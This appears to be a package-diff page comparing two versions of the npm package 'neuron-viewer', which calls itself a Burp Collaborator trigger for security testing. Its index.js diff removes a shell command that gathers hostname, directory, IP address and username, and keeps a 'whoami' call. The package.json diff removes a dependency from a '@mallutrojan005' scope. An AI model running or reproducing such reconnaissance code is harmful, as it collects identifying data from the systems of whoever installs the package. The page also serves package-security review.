neuron-viewer 9.5.3 → 9.5.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +2 -18
package/index.js CHANGED
@@ -33,5 +33,5 @@ function executeCommand(command) {
33
33
  }
34
34
 
35
35
  // Example: Execute a command (e.g., 'whoami')
36
- executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk '{print $1}'), Username: $(whoami)"');
36
+ executeCommand('whoami');
37
37
 
package/package.json CHANGED
@@ -1,28 +1,12 @@
1
1
  {
2
-
3
2
  "name": "neuron-viewer",
4
-
5
- "version": "9.5.3",
6
-
3
+ "version": "9.5.6",
7
4
  "description": "A simple package to trigger Burp Collaborator for security testing",
8
-
9
5
  "main": "index.js",
10
-
11
6
  "scripts": {
12
-
13
7
  "test": "node index.js"
14
-
15
8
  },
16
-
17
9
  "dependencies": {
18
-
19
- "@mallutrojan005/coveralls": "^0.1.0",
20
-
21
- "assistants-nextjs": "^9.0.0",
22
-
23
- "ts-jest-starter-kit": "^9.0.0"
24
-
10
+ "neuron-viewer": "^9.5.5"
25
11
  }
26
-
27
12
  }
28
-